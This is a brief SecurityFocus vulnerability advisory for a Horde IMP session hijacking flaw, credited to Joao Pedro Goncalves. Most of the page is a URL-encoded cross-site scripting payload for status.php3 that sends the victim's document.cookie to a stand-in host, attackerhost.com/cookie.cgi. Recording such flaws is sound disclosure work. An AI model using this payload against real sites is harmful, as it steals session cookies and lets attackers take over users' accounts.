Horde IMP Session Hijacking Vulnerability

The following example was provided by Joao Pedro Goncalves <megas@phibernet.org>:

http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript
%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co
m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%
20%27%3E%27)%3B%3C%2Fscript%3E%0A


 

Privacy Statement
Copyright 2010, SecurityFocus